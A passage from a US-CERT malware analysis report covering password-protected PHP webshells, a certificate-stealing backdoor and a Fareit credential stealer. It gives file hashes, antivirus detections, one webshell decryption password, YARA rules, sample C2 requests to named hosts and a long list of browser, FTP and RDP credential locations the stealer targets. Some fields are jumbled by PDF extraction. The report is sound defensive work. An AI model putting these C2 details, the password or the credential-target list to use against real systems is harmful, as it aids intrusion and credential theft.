Kaspersky
Backdoor.PHP.Agent.aav
TrendMicro
PHP_WEBSHELL.SMA
Sophos
Microsoft
Ahnlab
ESET
TrendMicroHouseCall
Ikarus
PHP/WebShell-O
Backdoor:PHP/Fobushell.G
PHP/Webshell
PHP/Krypt k.AJ trojan
PHP_WEBSHELL.SMA
Trojan.PHP.Crypt
Description
This file is a malicious PHP file containing an embedded obfuscated payload. This payload is Base64 encoded and password protected.
Analysis indicates that the web-shell will be accessed and executed through a browser by a remote user. The file will prompt the user to
enter a password. The password entered is submitted via $_POST and stored in a cookie at runtime.
US-CERT MIFR-10105049-Update2
9 of 63
2d5afec034705d2dc398f01c100636d51eb446f459f1c2602512fd26e86368e4
Details
Name
2d5afec034705d2dc398f01c100636d51eb446f459f1c2602512fd26e86368e4
Size
21377
Type
PHP script, ASCII text, with very long lines
7fce89d5e3d59d8e849d55d604b70a6f
SHA1
a0a6978f7022f71ad977760f492704216318b5cd
ssdeep
384:ZoO1rR0apTrdj4hK2IeJYORHxrPIHzDUCuJYL3Q3QX6imKrV3XVPeezCv:ZR1rxl0k2lJYORRyBg3XlKpnVPee+v
Entropy
6.10129283354
Antivirus
F-prot
PHP/WebShell.A
McAfee
PHP/WebShell.i
F-secure
Backdoor.PHP.AYP
Symantec
PHP.Backdoor.Trojan
ClamAV
Php.Malware.Agent-5486261-0
Kaspersky
Backdoor.PHP.Agent.abb
TrendMicro
PHP_WEBSHELL.SMA
Sophos
Microsoft
Ahnlab
ESET
TrendMicroHouseCall
Ikarus
PHP/WebShell-O
Backdoor:PHP/Fobushell.D
PHP/Webshell
PHP/Krypt k.AJ trojan
PHP_WEBSHELL.SMA
Trojan.PHP.Crypt
Description
This is a malicious PHP file containing an embedded obfuscated payload. This payload is Base64 encoded and password protected. During
runtime, this payload will be decoded and decrypted using combination of a base64_decode and a password. This password is submitted via
a POST request or in a cookie at runtime. The following password "|F3Jk~6k6" was used to decrypt the payload. The decrypted payload
contains a PHP webshell and has been identified as P.A.S. v.3.1.0. This webshell is a backdoor that provides an interface for various remote
operations, such as file explorer, searcher, SQL-client, network tools, command shell access, and server info features to a remote user once
installed on the compromised system. The following are some of the P.A.S webshell capabilities:
--Begin Capabilities-To view compromised server information.
File manager (copy, rename, move, download, upload, delete, jump, create files and folders).
Search files, objects, directories, and text in files.
SQL client to login and dump database and tables.
Network console to bindport, back-connect, and port scanner.
Command line console to execute command.
Execute PHP code.
--End Capabilities-The webshell interface is shown in image 1.0.
3bd682bb7870d5c8bc413cb4e0cc27e44b2358c8fc793b934c71b2a85b8169d7
Details
Name
3bd682bb7870d5c8bc413cb4e0cc27e44b2358c8fc793b934c71b2a85b8169d7
Size
21612
Type
PHP script, ASCII text, with very long lines, with CRLF line terminators
e80f92faa5e11007f9ffea6df2297993
SHA1
2c48e42c882b45861557ea1f139f3e8b31629c7c
ssdeep
384:FflOAr6OucUytsS8UdzMV3u2SmsyCDHEToBCGIbGA3taDPWA+0BWdLh:FfUAr6OJB18Cc3u2jseTo/cGA3taD+Aq
Entropy
6.11927531623
Antivirus
F-prot
PHP/WebShell.A
McAfee
PHP/WebShell.i
F-secure
Backdoor.PHP.AYP
Symantec
PHP.Backdoor.Trojan
US-CERT MIFR-10105049-Update2
10 of 63
ClamAV
Php.Malware.Agent-5486261-0
Kaspersky
Backdoor.PHP.Agent.aas
TrendMicro
PHP_WEBSHELL.SMA
Sophos
Microsoft
Ahnlab
ESET
TrendMicroHouseCall
Ikarus
PHP/WebShell-O
Backdoor:PHP/Fobushell.G
PHP/Webshell
PHP/Krypt k.AJ trojan
PHP_WEBSHELL.SMA
Trojan.PHP.Crypt
Description
This file is a malicious PHP file containing an embedded obfuscated payload.Analysis indicates that the web shell will be access and
execute through a browser by a remote user. The file will prompt the user to enter a password. The password entered is submitted via
$_POST and stored in a cookie at runtime. The embedded payload will be decoded and decrypted using combination of a base64_decode
and a password. The password was not part of the submission.
449e7a7cbc393ae353e8e18b5c31d17bb13235d0c07e9e319137543608749602
Details
Name
449e7a7cbc393ae353e8e18b5c31d17bb13235d0c07e9e319137543608749602
Size
21667
Type
PHP script, ASCII text, with very long lines
66948b04173b523ca773c3073afb506d
SHA1
e1ad80b0769b8b9dfb357a410af948127aabda97
ssdeep
384:C0LnByNA3w1C7+mUsR+3oGzY0esuvDDqpEhIqdbf1oZP4jihXro8AtoGXz:C0FgJXoGzY0mDDbIqNYP4jihXroltoGj
Entropy
6.09992131729
Antivirus
F-prot
PHP/WebShell.A
McAfee
PHP/WebShell.i
F-secure
Backdoor.PHP.AYP
Symantec
PHP.Backdoor.Trojan
ClamAV
Php.Malware.Agent-5486261-0
Kaspersky
Backdoor.PHP.Agent.aap
TrendMicro
PHP_WEBSHELL.SMA
Sophos
PHP/WebShell-O
Avira
PHP/Agent.12664
Microsoft
Ahnlab
ESET
TrendMicroHouseCall
Ikarus
Backdoor:PHP/Fobushell.G
PHP/Webshell
PHP/Krypt k.AJ trojan
PHP_WEBSHELL.SMA
Trojan.PHP.Crypt
Description
This file is a malicious PHP file containing an embedded obfuscated payload. This payload is Base64 encoded and password protected.
Analysis indicates that the web-shell will be accessed and executed through a browser by a remote user. The file will prompt the user to
enter a password. The password entered is submitted via $_POST and stored in a cookie at runtime.
7dac01e818bd5a01fe75c3324f6250e3f51977111d7b4a94e41307bf463f122e
Details
Name
7dac01e818bd5a01fe75c3324f6250e3f51977111d7b4a94e41307bf463f122e
Size
21445
Type
PHP script, ASCII text, with very long lines, with CRLF line terminators
a5e933d849367d623d1f2692b6691bbf
SHA1
b788dce411fe0e1e1b7b476184aa6bbd0f8e3e31
ssdeep
384:5WermnyinsjQ+b3f+qzolbopGdiWy6diduFrg:5XaytEm3GCpGdMuFrg
Entropy
6.11582358023
US-CERT MIFR-10105049-Update2
11 of 63
Antivirus
F-prot
PHP/WebShell.A
McAfee
PHP/WebShell.i
F-secure
Backdoor.PHP.AYP
Symantec
PHP.Backdoor.Trojan
ClamAV
Php.Malware.Agent-5486261-0
Kaspersky
Backdoor.PHP.Agent.aaq
TrendMicro
PHP_WEBSHELL.SMA
Sophos
PHP/WebShell-O
Avira
PHP/Agent.12661
Microsoft
Ahnlab
ESET
TrendMicroHouseCall
Ikarus
Backdoor:PHP/Fobushell.G
PHP/Webshell
PHP/Krypt k.AJ trojan
PHP_WEBSHELL.SMA
Trojan.PHP.Crypt
Description
This file is a malicious PHP file containing an embedded obfuscated payload. This payload is Base64 encoded and password protected.
Analysis indicates that the web-shell will be accessed and executed through a browser by a remote user. The file will prompt the user to
enter a password. The password entered is submitted via $_POST and stored in a cookie at runtime.
9376e20164145d9589e43c39c29be3a07ecdfd9c5c3225a69f712dc0ef9d757f
Details
Name
9376e20164145d9589e43c39c29be3a07ecdfd9c5c3225a69f712dc0ef9d757f
Size
21182
Type
PHP script, ASCII text, with very long lines
dc4594dbeafbc8edfa0ac5983b295d9b
SHA1
82c4d3753a8ee26f0468e79bf5d90ada04c612ea
384:5e0nReo3P8WiT/7AxG7+4g6NdSB1env3qnEkgAFHJNdfoNuWs3yYKGYWZ0QxzTFI:5RzI
/sxG7+762Be0skJNdfoNuWVbWZ0V
6.10088739359
ssdeep
Entropy
Antivirus
F-prot
PHP/WebShell.A
McAfee
PHP/WebShell.i
F-secure
Backdoor.PHP.AYP
Symantec
PHP.Backdoor.Trojan
ClamAV
Php.Malware.Agent-5486261-0
Kaspersky
Backdoor.PHP.Agent.abd
TrendMicro
PHP_WEBSHELL.SMA
Sophos
Microsoft
Ahnlab
ESET
TrendMicroHouseCall
Ikarus
PHP/WebShell-O
Backdoor:PHP/Fobushell.G
PHP/Webshell
PHP/Krypt k.AJ trojan
PHP_WEBSHELL.SMA
Trojan.PHP.Crypt
Description
This file is a malicious PHP file containing an embedded obfuscated payload. This payload is Base64 encoded and password protected.
Analysis indicates that the web-shell will be accessed and executed through a browser by a remote user. The file will prompt the user to
enter a password. The password entered is submitted via $_POST and stored in a cookie at runtime.
a0c00aca2f34c1f5ddcf36be2ccca4ce63b38436faf45f097d212c59d337a806
Details
Name
Size
a0c00aca2f34c1f5ddcf36be2ccca4ce63b38436faf45f097d212c59d337a806
21191
US-CERT MIFR-10105049-Update2
12 of 63
Type
PHP script, ASCII text, with very long lines
1ec7f06f1ee4fa7cecd17244eec24e07
SHA1
ae167bca0863cfccba9cc9cf5e3cafce6fa6b92c
ssdeep
384:s7ueraQSysFXnTPy9U3KRpz0x8Q1wKM5ivFV8rfAcrOf+U8zVYG:32sFXTPy9U3Qze8SwK2iooEOmKG
Entropy
6.1011365049
Antivirus
F-prot
PHP/WebShell.A
McAfee
PHP/WebShell.i
F-secure
Backdoor.PHP.AYP
Symantec
PHP.Backdoor.Trojan
ClamAV
Php.Malware.Agent-5486261-0
Kaspersky
Backdoor.PHP.Agent.aba
TrendMicro
PHP_WEBSHELL.SMA
Sophos
Microsoft
Ahnlab
ESET
TrendMicroHouseCall
Ikarus
PHP/WebShell-O
Backdoor:PHP/Fobushell.G
PHP/Webshell
PHP/Krypt k.AJ trojan
PHP_WEBSHELL.SMA
Trojan.PHP.Crypt
Description
This file is a malicious PHP file containing an embedded obfuscated payload. This payload is Base64 encoded and password protected.
Analysis indicates that the web-shell will be accessed and executed through a browser by a remote user. The file will prompt the user to
enter a password. The password entered is submitted via $_POST and stored in a cookie at runtime.
bd7996752cac5d05ed9d1d4077ddf3abcb3d291321c274dbcf10600ab45ad4e4
Details
Name
bd7996752cac5d05ed9d1d4077ddf3abcb3d291321c274dbcf10600ab45ad4e4
Size
21377
Type
PHP script, ASCII text, with very long lines
70f93f4f17d0e46137718fe59591dafb
SHA1
1e49a68c72ef40e8c333007a7e7f56de1b29c842
ssdeep
384:EIiH2ER39I1Vv+kIPEWWjYc+CmJNHKblvcDSRRjqSA93DuxuXvWxUort:EIy2ER3CL+khWUYcsJtMcDiuSA93Duxf
Entropy
6.09482710893
Antivirus
F-prot
PHP/WebShell.A
McAfee
PHP/WebShell.i
F-secure
Backdoor.PHP.AYP
VirIT
Trojan.PHP.Shell.LV
Symantec
PHP.Backdoor.Trojan
ClamAV
Php.Malware.Agent-5486261-0
Kaspersky
Backdoor.PHP.Agent.aaw
TrendMicro
PHP_WEBSHELL.SMA
Sophos
Microsoft
Ahnlab
ESET
TrendMicroHouseCall
Ikarus
PHP/WebShell-O
Backdoor:PHP/Fobushell.G
PHP/Webshell
PHP/Krypt k.AJ trojan
PHP_WEBSHELL.SMA
Trojan.PHP.Crypt
Description
This file is a malicious PHP file containing an embedded obfuscated payload. This payload is Base64 encoded and password protected.
Analysis indicates that the web-shell will be accessed and executed through a browser by a remote user. The file will prompt the user to
enter a password. The password entered is submitted via $_POST and stored in a cookie at runtime.
US-CERT MIFR-10105049-Update2
13 of 63
rule unidentified_malware
meta:
Author = "US-CERT Code Analysis Team"
Date = 16JAN17
Incident = 10105049
MD5 = "8F154D23AC2071D7F179959AABA37AD5"
strings:
$my_string_one = { 8D 78 03 8A 65 FF 8D A4 24 00 00 00 00 8A 04 0F 32 C4 88 04 11 41 3B CE 72 F3 }
$my_string_two = "CryptAcquireCertificatePrivateKey"
$my_string_three = "CertFreeCertificateContext"
$my_string_four = "CertEnumCertificatesInStore"
$my_string_five = "PFXImportCertStore"
condition:
all of them
End YARA Signature
During runtime, the malware attempts to communicate with its C2 server, private.directinvesting.com. Displayed below are sample
connections between the malware and its C2 server.
Begin Sample C2 Connections
GET /lexicon/index.cfm?dq=d9487&pg=149a8d6adb73d479e66c6 HTTP/1.1
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR
3.5.21022)
Host: private.directinvesting.com
Connection: Keep-Alive
Cache-Control: no-cache
Pragma: no-cache
GET /lexicon/index.cfm?source=0887a&css=b9&utm_term=80aaeb73d479e66c6&f=12 HTTP/1.1
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR
3.5.21022)
Host: private.directinvesting.com
Connection: Keep-Alive
Cache-Control: no-cache
Pragma: no-cache
GET /lexicon/index.cfm?utm_content=876b73d479e66c6&source=19bd05efa8c HTTP/1.1
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR
3.5.21022)
Host: private.directinvesting.com
Connection: Keep-Alive
Cache-Control: no-cache
Pragma: no-cache
End Sample C2 Connections
The application attempts to download data from a C2 server and write it to a randomly named .tmp file within the users %TEMP% directory.
Some of the file names used to store this downloaded data within our lab environment are displayed below:
Begin Sample File Names
TEMP\Cab1D5.tmp
TEMP\Cab1D7.tmp
TEMP\Cab1DA.tmp
TEMP\Cab1DC.tmp
End Sample File Names
Analysis indicates this application provides several notable capabilities to an operator. The program provides an operator access to a
reverse shell on the victim system. Additionally, the malware provides an operator the capability to enumerate the victims Windows
Certificate Store, and extract identified digital certificates, including private keys. The application also allows an operator to enumerate all
physical drives and network resources the victim system has access to.
US-CERT MIFR-10105049-Update2
15 of 63
secure strings method.
Begin YARA Signature
rule unidentified_malware
meta:
Author = "US-CERT Code Analysis Team"
Date = 16JAN17
Incident = 10105049
File = "9acba7e5f972cdd722541a23ff314ea81ac35d5c0c758eb708fb6e2cc4f598a0"
MD5 = "AE7E3E531494B201FBF6021066DDD188"
strings:
$my_string_one = { 8D 78 03 8A 65 FF 8D A4 24 00 00 00 00 8A 04 0F 32 C4 88 04 11 41 3B CE 72 F3 }
$my_string_two = "CryptAcquireCertificatePrivateKey"
$my_string_three = "CertFreeCertificateContext"
$my_string_four = "CertEnumCertificatesInStore"
$my_string_five = "PFXImportCertStore"
condition:
all of them
End YARA Signature
During runtime, the malware attempts to communicate with its C2 server, cderlearn[.]com. Displayed below are sample connections between
the malware and its C2 server.
Begin Sample C2 Connections
POST /search.cfm HTTP/1.1
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR
3.5.21022)
Host: www[.]cderlearn.com
Content-Length: 38
Connection: Keep-Alive
Cache-Control: no-cache
Pragma: no-cache
rss=a5ce5fa&pg=f8&sa=8816db73d479e8e35
POST /search.cfm HTTP/1.1
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR
3.5.21022)
Host: www[.]cderlearn.com
Content-Length: 46
Cache-Control: no-cache
id=3&source=a804b4b73d479eebea&rss=53d0&ei=d3c
End Sample C2 Connections
The application attempts to download data from a C2 server and write it to a randomly named .tmp file within the users %TEMP% directory.
Some of the file names used to store this downloaded data within our lab environment are displayed below:
Begin Sample File Names
TEMP\Cab5.tmp
TEMP\Tar6.tmp
TEMP\Cab7.tmp
TEMP\Tar8.tmp
End Sample File Names
Analysis indicates this application provides several notable capabilities to an operator. The program provides an operator access to a
reverse shell on the victim system. Additionally, the malware provides an operator the capability to enumerate the victims Windows
Certificate Store, and extract identified digital certificates, including private keys. The application also allows an operator to enumerate all
physical drives and network resources the victim system has access to.
US-CERT MIFR-10105049-Update2
17 of 63
Screenshots
digital_cert_steal.bmp
Screen shot of code used by 9acba7e5f972cdd722541a23ff314ea81ac35d5c0c758eb708fb6e2cc4f598a0 to steal a victim users
digital certificates from the Windows Certificate Store.
ac30321be90e85f7eb1ce7e211b91fed1d1f15b5d3235b9c1e0dad683538cc8e
Details
Name
ac30321be90e85f7eb1ce7e211b91fed1d1f15b5d3235b9c1e0dad683538cc8e
Size
714679
Type
Rich Text Format data, version 1, unknown character set
81f1af277010cb78755f08dfcc379ca6
SHA1
9cb7716d83c0d06ab356bdfa52def1af64bc5210
ssdeep
3072:0gOxPV0p1knm8Z0gPJQ3kq9d6AvgBodb30aCubtvn7JBsEitau3QCv:jOBVs1knm8ZPJQ3kqoodkuZjlbVY
Entropy
3.29548128269
Antivirus
F-prot
W32/Dridex.HX
McAfee
Fareit-FHF
NetGate
Trojan.Win32.Malware
F-secure
Gen:Variant.Razy.41230
Symantec
Trojan.Fareit
VirusBlokAda
TrojanPSW.Fareit
ClamAV
Win.Trojan.Agent-5486255-0
Kaspersky
Trojan-PSW.Win32.Fareit.bshk
TrendMicro
TROJ_FA.6BBF19ED
Sophos
Avira
Microsoft
Ahnlab
NANOAV
Troj/Fareit-AMQ
TR/AD.Fareit.Y.ehkw
PWS:Win32/Fareit
RTF/Dropper
Trojan.Rtf.Stealer.efqzyl
TrendMicroHouseCall
TROJ_FA.6BBF19ED
Ikarus
Trojan.Win32.Zlader
Relationships
ac30321be90e85f7eb1ce7e211b91fed1d1f15b5d
US-CERT MIFR-10105049-Update2
Dropped
9f918fb741e951a10e68ce6874b839aef5a26d604
18 of 63
3235b9c1e0dad683538cc8e (81f1a)
ac30321be90e85f7eb1ce7e211b91fed1d1f15b5d
3235b9c1e0dad683538cc8e (81f1a)
86db31e509f8dcaa13acec5 (617ba)
Characterized_By
ac30321be90e85f7eb1ce7e211b91fed1d1f15b5d
3235b9c1e0dad683538cc8e
Description
This is a malicious RTF document containing an embedded encoded executable. Upon execution, the RTF will decode and install the
executable to %Temp%\m3.tmp (9f918fb741e951a10e68ce6874b839aef5a26d60486db31e509f8dcaa13acec5). The encoded executable is
decoded using a hexadecimal algorithm. The document will attempt to execute m3.tmp but fails to execute due to the file exetension.
Screenshots
ac30321be90e85f7eb1ce7e211b91fed1d1f15b5d3235b9c1e0dad683538cc8e
9f918fb741e951a10e68ce6874b839aef5a26d60486db31e509f8dcaa13acec5
Details
Name
9f918fb741e951a10e68ce6874b839aef5a26d60486db31e509f8dcaa13acec5
Size
117248
Type
PE32 executable (GUI) Intel 80386, for MS Windows
617ba99be8a7d0771628344d209e9d8a
SHA1
7cefb021fb30f985b427b584be9c16e364836739
ssdeep
3072:CN7FVxVzbL02rXlwiIrClX1O6OhOqsY9WZYWmwdaX82X45iAKMaEUSDslGz0x:CNxVjbLXDup2lXY6O0VYIOMW
Entropy
6.86854130027
Antivirus
F-prot
W32/Dridex.HX
McAfee
Fareit-FHF
Trojan ( 004df8ee1 )
Systweak
trojan.passwordstealer
F-secure
Gen:Variant.Razy.41230
VirIT
Symantec
VirusBlokAda
Trojan.Win32.Crypt5.AYWX
Trojan.Fareit
TrojanPSW.Fareit
Zillya!
Trojan.Fareit.Win32.14782
ClamAV
Win.Trojan.Agent-5486256-0
Kaspersky
Trojan-PSW.Win32.Fareit.bshk
TrendMicro
TSPY_FA.CFEECD19
Sophos
Avira
Troj/Fareit-AMQ
TR/AD.Fareit.Y.ehkw
Microsoft
PWS:Win32/Fareit
Ahnlab
Trojan/Win32.Fareit
US-CERT MIFR-10105049-Update2
19 of 63
The file xtool.exe was not available for download at the time of analysis.
This executable file drops and executes a batch file '%Temp%\[random digits].bat' to delete itself and the batch file at the end of the
execution.
Displayed below are sample connections between the malware and its C2 server.
Begin Sample Connections to C2 Server
POST /zapoy/gate.php HTTP/1.0
Host: wilcarobbe.com
Accept: */*
Accept-Encoding: identity, *;q=0
Accept-Language: en-US
Content-Length: 196
Content-Type: application/octet-stream
Connection: close
Content-Encoding: binary
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR
3.5.21022)
...[xXP..YG.....4...d...S.qO....4.....v..8 ..Y.u.
X..3S*3.S..%?.".).....>...
>V....H...;4.......OGf.'L..fB.N#.v[H.b_.{..w......j5
POST /zapoy/gate.php HTTP/1.0
Host: littjohnwilhap.ru
Accept: */*
Accept-Encoding: identity, *;q=0
Accept-Language: en-US
Content-Length: 196
Content-Type: application/octet-stream
Connection: close
Content-Encoding: binary
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR
3.5.21022)
...[xXP..YG.....4...d...S.qO....4.....v..8 ..Y.u.
X..3S*3.S..%?.".).....>...
>V....H...;4.......OGf.'L..fB.N#.v[H.b_.{..w......j5
POST /zapoy/gate.php HTTP/1.0
Host: ritsoperrol.ru
Accept: */*
Accept-Encoding: identity, *;q=0
Accept-Language: en-US
Content-Length: 196
Content-Type: application/octet-stream
Connection: close
Content-Encoding: binary
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR
3.5.21022)
...[xXP..YG.....4...d...S.qO....4.....v..8 ..Y.u.
X..3S*3.S..%?.".).....>...
>V....H...;4.......OGf.'L..fB.N#.v[H.b_.{..w......j5
End Sample Connections to C2 Server
Static analysis of the unpacked portions of this file indicate it is, among other things, capable of targeting multiple Windows applications. For
example, the malware searches the Windows registry for keys utilized by multiple types of Windows email software. If found, the malware
attempts to extract email passwords from these keys. This appears to be an attempt to gain unauthorized access to the victim users emails.
In addition, the software attempts to find registry keys used by the Windows file management software named Total Commander. This
appears to be an attempt to gain unauthorized access to the victim users stored files. The software also contains a list of commonly used
passwords. This indicates the malware provides an operator the capability to brute force their way into a victim users email accounts or
locations where their files are stored. Displayed below is a YARA signature which may be utilized to detect this software both packed on disk,
and running within system memory.
Begin YARA Signature
US-CERT MIFR-10105049-Update2
21 of 63
rule unidentified_malware_two
meta:
Author = "US-CERT Code Analysis Team"
Date = 16JAN17
Incident = 10105049
File = "9f918fb741e951a10e68ce6874b839aef5a26d60486db31e509f8dcaa13acec5"
MD5 = "617BA99BE8A7D0771628344D209E9D8A"
strings:
$my_string_one = "/zapoy/gate.php"
$my_string_two = { E3 40 FE 45 FD 0F B6 45 FD 0F B6 14 38 88 55 FF 00 55 FC 0F B6 45 FC 8A 14 38 88 55 FE 0F B6 45 FD 88 14 38
0F B6 45 FC 8A 55 FF 88 14 38 8A 55 FF 02 55 FE 8A 14 3A 8B 45 F8 30 14 30 }
$my_string_three = "S:\\Lidstone\\renewing\\HA\\disable\\In.pdb"
$my_string_four = { 8B CF 0F AF CE 8B C6 99 2B C2 8B 55 08 D1 F8 03 C8 8B 45 FC 03 C2 89 45 10 8A 00 2B CB 32 C1 85 DB 74 07 }
$my_string_five = "fuckyou1"
$my_string_six = "xtool.exe"
condition:
($my_string_one and $my_string_two) or ($my_string_three or $my_string_four) or ($my_string_five and $my_string_six)
End YARA Signature-Displayed below are strings of interest extracted from the unpacked portions of this malware:
Begin Strings of Interest
1DA409EB2825851644CCDAB
1RcpNUE12zpJ8uDaDqlygR70aZl2ogwes
wilcarobbe.com/zapoy/gate.php
littjohnwilhap.ru/zapoy/gate.php
ritsoperrol.ru/zapoy/gate.php
one2shoppee.com/system/logs/xtool.exe
insta.reduct.ru/system/logs/xtool.exe
editprod.waterfilter.in.ua/system/logs/xtool.exe
YUIPWDFILE0YUIPKDFILE0YUICRYPTED0YUI1.0
MODU
SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall
UninstallString
DisplayName
.exe
Software\WinRAR
open
vaultcli.dll
VaultOpenVault
VaultEnumerateItems
VaultGetItem
VaultCloseVault
VaultFree
kernel32.dll
WTSGetActiveConsoleSessionId
ProcessIdToSessionId
netapi32.dll
NetApiBufferFree
NetUserEnum
ole32.dll
StgOpenStorage
advapi32.dll
AllocateAndInitializeSid
CheckTokenMembership
FreeSid
CredEnumerateA
CredFree
CryptGetUserKey
CryptExportKey
CryptDestroyKey
CryptReleaseContext
RevertToSelf
US-CERT MIFR-10105049-Update2
22 of 63
OpenProcessToken
ImpersonateLoggedOnUser
GetTokenInformation
ConvertSidToStringSidA
LogonUserA
LookupPrivilegeValueA
AdjustTokenPrivileges
CreateProcessAsUserA
crypt32.dll
CryptUnprotectData
CertOpenSystemStoreA
CertEnumCertificatesInStore
CertCloseStore
CryptAcquireCertificatePrivateKey
msi.dll
MsiGetComponentPathA
pstorec.dll
PStoreCreateInstance
userenv.dll
CreateEnvironmentBlock
DestroyEnvironmentBlock
vshell32.dll
SHGetFolderPathA
My Documents
AppData
Local AppData
Cache
Cookies
History
My Documents
Common AppData
My Pictures
Common Documents
Common Administrative Tools
Administrative Tools
Personal
Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders
explorer.exe
S-1-5-18
SeImpersonatePrivilege
SeTcbPrivilege
SeChangeNotifyPrivilege
SeCreateTokenPrivilege
SeBackupPrivilege
SeRestorePrivilege
SeIncreaseQuotaPrivilege
SeAssignPrimaryTokenPrivilege
GetNativeSystemInfo
kernel32.dll
IsWow64Process
Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/5.0)
POST %s HTTP/1.0
Host: %s
Accept: */*
Accept-Encoding: identity, *;q=0
Accept-Language: en-US
Content-Length: %lu
Content-Type: application/octet-stream
Connection: close
Content-Encoding: binary
User-Agent: %s
Content-Length:
Location:
\*.*
Software\Microsoft\Windows\CurrentVersion\Internet Settings
ProxyServer
HWID
US-CERT MIFR-10105049-Update2
23 of 63
{%08X-%04X-%04X-%02X%02X-%02X%02X%02X%02X%02X%02X}
Software\Far\Plugins\FTP\Hosts
Software\Far2\Plugins\FTP\Hosts
Software\Far Manager\Plugins\FTP\Hosts
Software\Far\SavedDialogHistory\FTPHost
Software\Far2\SavedDialogHistory\FTPHost
Software\Far Manager\SavedDialogHistory\FTPHost
Password
HostName
User
Line
wcx_ftp.ini
\GHISLER
InstallDir
FtpIniName
Software\Ghisler\Windows Commander
Software\Ghisler\Total Commander
CUTEFTP
QCHistory
Software\GlobalSCAPE\CuteFTP 6 Home\QCToolbar
Software\GlobalSCAPE\CuteFTP 6 Professional\QCToolbar
Software\GlobalSCAPE\CuteFTP 7 Home\QCToolbar
Software\GlobalSCAPE\CuteFTP 7 Professional\QCToolbar
Software\GlobalSCAPE\CuteFTP 8 Home\QCToolbar
Software\GlobalSCAPE\CuteFTP 8 Professional\QCToolbar
Software\GlobalSCAPE\CuteFTP 9\QCToolbar
\GlobalSCAPE\CuteFTP
\GlobalSCAPE\CuteFTP Pro
\GlobalSCAPE\CuteFTP Lite
\CuteFTP
\sm.dat
Software\FlashFXP\3
Software\FlashFXP
Software\FlashFXP\4
InstallerDathPath
path
Install Path
DataFolder
\Sites.dat
\Quick.dat
\History.dat
\FlashFXP\3
\FlashFXP\4
\FileZilla
\sitemanager.xml
\recentservers.xml
\filezilla.xml
Software\FileZilla
Software\FileZilla Client
Install_Dir
Host
User
Pass
Port
Remote Dir
Server Type
Server.Host
Server.User
Server.Pass
Server.Port
Path
ServerType
Last Server Host
Last Server User
Last Server Pass
Last Server Port
Last Server Path
Last Server Type
Software\FTPWare\COREFTP\Sites
Host
User
Port
US-CERT MIFR-10105049-Update2
24 of 63
PthR
.ini
\VanDyke\Config\Sessions
\Sessions
Software\VanDyke\SecureFX
Config Path
Password
HostName
UserName
RemoteDirectory
PortNumber
FSProtocol
Software\Martin Prikryl
http[:]//
https[:]//
ftp://
opera
wand.dat
_Software\Opera Software
Last Directory3
Last Install Path
Opera.HTML\shell\open\command
\Opera Software
nss3.dll
NSS_Init
NSS_Shutdown
NSSBase64_DecodeBuffer
SECITEM_FreeItem
PK11_GetInternalKeySlot
PK11_Authenticate
PK11SDR_Decrypt
PK11_FreeSlot
profiles.ini
Profile
IsRelative
Path
PathToExe
prefs.js
logins.json
signons.sqlite
signons.txt
signons2.txt
signons3.txt
encryptedPassword":"
encryptedUsername":"
hostname":"
Firefox
\Mozilla\Firefox\
Software\Mozilla
--ftp://
http[:]//
https[:]//
ftp.
Mozilla
\Mozilla\Profiles\
Favorites.dat
WinFTP
Internet Explorer
WininetCacheCredentials
MS IE FTP Passwords
DPAPI:
@J7<
AJ7<
BJ7<
%02X
Software\Microsoft\Internet Explorer\IntelliForms\Storage2
SOFTWARE\Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage
US-CERT MIFR-10105049-Update2
25 of 63
\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\IntelliForms\FormData
http[:]//www[.]facebook.com/
Microsoft_WinInet_*
ftp://
SspiPfc
;USQLite format 3
table
CONSTRAINT
PRIMARY
UNIQUE
CHECK
FOREIGN
Web Data
Login Data
logins
origin_url
password_value
username_value
ftp://
http[:]//
https[:]//
moz_logins
hostname
encryptedPassword
encryptedUsername
\Google\Chrome
\Chromium
\ChromePlus
Software\ChromePlus
Install_Dir
.rdp
TERMSRV/*
password 51:b:
username:s:
full address:s:
TERMSRV/
.oeaccount
Salt
<_OP3_Password2
<_MTP_Password2
>> Last update of whois database: Mon, 16 Jan 2017 12:55:58 GMT <<<
Queried whois.networksolutions.com with "directinvesting.com"...
Domain Name: DIRECTINVESTING.COM
Registry Domain ID: 5318825_DOMAIN_COM-VRSN
Registrar WHOIS Server: whois.networksolutions.com
Registrar URL: http[:]//networksolutions.com
Updated Date: 2016-06-04T07:10:34Z
Creation Date: 1997-08-04T04:00:00Z
Registrar Registration Expiration Date: 2021-08-03T04:00:00Z
Registrar: NETWORK SOLUTIONS, LLC.
Registrar IANA ID: 2
Registrar Abuse Contact Email: abuse@web.com
Registrar Abuse Contact Phone: +1.8003337680
Reseller:
Domain Status: clientTransferProhibited https[:]//icann.org/epp#clientTransferProh bited
Registry Registrant ID:
Registrant Name: The Moneypaper Inc.
Registrant Organization: The Moneypaper Inc.
Registrant Street: 555 THEODORE FREMD AVE STE B103
Registrant City: RYE
Registrant State/Province: NY
Registrant Postal Code: 10580-1456
Registrant Country: US
Registrant Phone: +1.9149250022
Registrant Phone Ext:
Registrant Fax: +1.9149219318
